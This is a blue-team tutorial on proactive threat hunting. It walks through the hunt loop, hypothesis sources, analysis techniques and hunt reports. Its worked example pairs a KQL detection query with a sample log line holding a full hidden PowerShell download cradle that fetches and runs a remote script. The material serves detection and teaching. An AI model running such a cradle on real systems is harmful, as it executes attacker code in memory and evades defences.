Advanced Defense (Blue Team) Updated on Jun 25, 2025

Threat Hunting — Proactive Threat Search

Threat hunting is the proactive, human-driven search for threats that slipped past automated tools. Instead of waiting for an alert, the analyst forms hypotheses based on threat intelligence and goes after the data.

Why hunt?

Automated tools detect known patterns. Sophisticated attackers use novel techniques or live off the land (LOLBins). An experienced hunter finds what the SIEM hasn’t ruled on yet.

The threat hunting loop

1. Hypothesis
      │
      ▼
2. Data collection ──► logs, EDR telemetry, PCAP, AD events
      │
      ▼
3. Investigation ──► queries, scripts, visualization
      │
      ▼
4. Discovery ──► TTP confirmed or hypothesis discarded
      │
      ▼
5. Response / new detection rule

Hypothesis sources

CTI (Cyber Threat Intelligence): APT group reports, IoC feeds.
MITRE ATT&CK: “Is T1059 (Command-Line Interface) being abused here?”
Internal anomalies: unusual host making high-volume DNS lookups.
Previous incidents: attacker may have left traces beyond what was remediated.

Hunt example: suspicious PowerShell

Hypothesis: “An attacker is using PowerShell with a download cradle to execute code in memory.”

Query (Elastic KQL):
process.name: "powershell.exe"
AND process.command_line: (*DownloadString* OR *IEX* OR *Invoke-Expression*)
AND NOT process.parent.name: ("sccm.exe" OR "wsus.exe")

Result:
host: WIN-DEV-03
user: pedro.silva
cmd: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.99/stage2.ps1')"
timestamp: 2026-06-24T03:17:42Z

Download at 3am, in hidden mode, from an internal IP. High suspicion. Escalate to IR.

Analysis techniques

Stack counting: group by field and look for outliers (e.g., rare child processes of winword.exe).
Frequency analysis: processes appearing on few hosts are more suspicious.
Timeline analysis: sort a host’s events by time to see the execution chain.
Graph analysis: map lateral connections between compromised hosts.

Hunter tools

Tool	Use
Elastic / KQL	Log and EDR queries
Velociraptor	Large-scale telemetry collection
OSQuery	SQL over system state
Zeek	Network traffic analysis
YARA	Malware hunting in files

Documenting the hunt

Every hunt should produce an artifact:

Hunt Report:
  Hypothesis: use of LOLBins for AV evasion
  Period: 2026-06-01 to 2026-06-25
  Sources: Windows Event Logs, EDR telemetry
  Result: negative (hypothesis discarded)
  New rule created: yes — alert on certutil.exe with download flag

Hunts that find nothing also have value: they increase confidence in the environment and generate new detection rules.